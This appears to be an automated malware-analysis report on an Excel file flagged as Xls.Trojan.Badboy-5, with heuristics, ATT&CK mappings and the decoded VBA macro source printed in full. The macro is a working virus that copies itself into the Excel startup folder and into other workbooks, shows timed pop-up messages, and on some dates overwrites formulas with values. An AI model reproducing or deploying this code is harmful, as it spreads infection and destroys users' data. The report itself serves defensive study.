MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV detection and high-severity Workbook_Open macro heuristic indicate malicious intent. The VBA script attempts to establish persistence by saving a copy of itself as 'Books.xls' in the Excel startup path, which is then likely executed automatically upon Excel launch. This behavior is characteristic of a trojan designed to maintain a foothold on the system.
Heuristics 3
-
ClamAV: Xls.Trojan.Badboy-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Badboy-5
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14015 bytes |
SHA-256: f48ac8033a7fe63c7da32d40a9f0727a1ffd84c4356686deb93daaae62a0d439 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Sn = "Books.xls"
Sub CreatSelf(r As String)
On Error Resume Next
Application.DisplayAlerts = False
LookAdd
Application.ActiveWorkbook.SaveAs r
Application.DisplayAlerts = True
On Error GoTo 0
End Sub
Private Sub Workbook_Open()
On Error Resume Next
Application.ScreenUpdating = False
r = Application.StartupPath & "\" & Sn
s = Application.Workbooks(Sn).Name
If s = "" Then
cf = ActiveWorkbook.Name
Application.Workbooks.Add
CreatSelf (r)
Workbooks(cf).Activate
End If
CheckMsg
Application.ScreenUpdating = True
On Error GoTo 0
End Sub
Function LookAdd() As Boolean
On Error Resume Next
If ThisWorkbook.Name = ActiveWorkbook.Name Then GoTo NoAdd
With ActiveWorkbook.VBProject.VBComponents("ThisWorkbook")
s = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines
m = .CodeModule.CountOfLines
If m >= s Then GoTo NoAdd
Do While .CodeModule.CountOfLines > 0
.CodeModule.DeleteLines 1, .CodeModule.CountOfLines
Loop
For i = 1 To s
sl = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(i, 1)
.CodeModule.InsertLines i, sl
Next i
ap = ActiveWorkbook.Path
If ap <> "" Then ActiveWorkbook.Save
End With
YesAdd:
LookAdd = True
On Error GoTo 0
Exit Function
NoAdd:
LookAdd = False
On Error GoTo 0
End Function
Sub LookIt()
On Error Resume Next
LookAdd
Application.ScreenUpdating = True
On Error GoTo 0
End Sub
Sub CheckMsg()
On Error Resume Next
Dim RndResult As Integer, C As Integer
Dim MsgS(1 To 4) As String, YesS(1 To 2) As String, NoS(1 To 2) As String
Static Ot As Date
Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg", schedule:=False
MsgS(1) = "ÎÒ²ÂÏë,ÄãÒ»¶¨ºÜ¿É°®,Ô¼Äãµ½½ÖÐĹ«Ô°É¢É¢²½,Äã²»½éÒâ°É !"
MsgS(2) = "½ñÌìµÄÒ¹¾°Í¦ÃÀ , Ô¼Äãµ½ÒôÀÖ¿§·È¹Ý×ø×ø,ºÃÂð ?!"
MsgS(3) = "Ù»Ãà ! ¼ûµ½ÄãÕæ¸ßÐË,½ñÍíÔ¼Äãµ½µÄÊ¿¸ßÌøÎè,²»ÖªÒâÏÂÈçºÎ !"
MsgS(4) = "С²öè ! ÔÛÃÇ»¹ÊÇÏȽâ¾öÄãµÄ²ö×ìÎÊÌâ,´óÅŵµÈçºÎ !"
YesS(1) = "Ì«ºÃÁË, ¼ûÃæºóÎÒÒ»¶¨ÒªÇë½ÌÄãµÄ·¼Ãû !"
YesS(2) = "×¢Òâ , ÎÒÊÖÖÐÄÃ×ÅÒ»ÊøÏÊ»¨ÔÚÃſڵÈÄã !"
NoS(1) = "Õæ²»ÇÉ , Õâ¸öµØ·½ÒѾͣҵÁË !"
NoS(2) = "¿´ÎÒÕâ¼ÇÐÔ , ¾ÓÈ»ÍüÁËÄǸöµØ·½ÔÚÄĶù !"
Randomize
RndResult = Int((4 * Rnd) + 1)
C = MsgBox(MsgS(RndResult), vbYesNo, "Ï£ÍûÄãÄܽÓÊÜÎÒµÄÑûÇë!")
Randomize
If C = vbYes Then
If LookAdd = True Then
RndResult = Int((2 * Rnd) + 1)
MsgBox YesS(RndResult), vbOKOnly, "ºÍÄãÔ¼»á,ÎҺÿªÐÄŶ!"
Else
C = vbNo
End If
End If
If C = vbNo Then
'Bad boy
Application.ScreenUpdating = False
If Right(Date$, 1) = 1 Then
ol = Selection.Address
Cells.Select
Application.CutCopyMode = False
Selection.Copy
Selection.PasteSpecial Paste:=xlValues, Operation:=xlNone, SkipBlanks:= _
False, Transpose:=False
Application.CutCopyMode = False
Range(ol).Select
ap = ActiveWorkbook.Path
If ap <> "" Then ActiveWorkbook.Save
End If
Application.ScreenUpdating = True
RndResult = Int((2 * Rnd) + 1)
MsgBox NoS(RndResult), vbOKOnly, "Íò·ÖÒź¶,Ï£ÍûÏ´λ¹Óлú»á!"
End If
Ot = Now + TimeValue("00:10:00")
Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg"
On Error GoTo 0
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_Pre
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.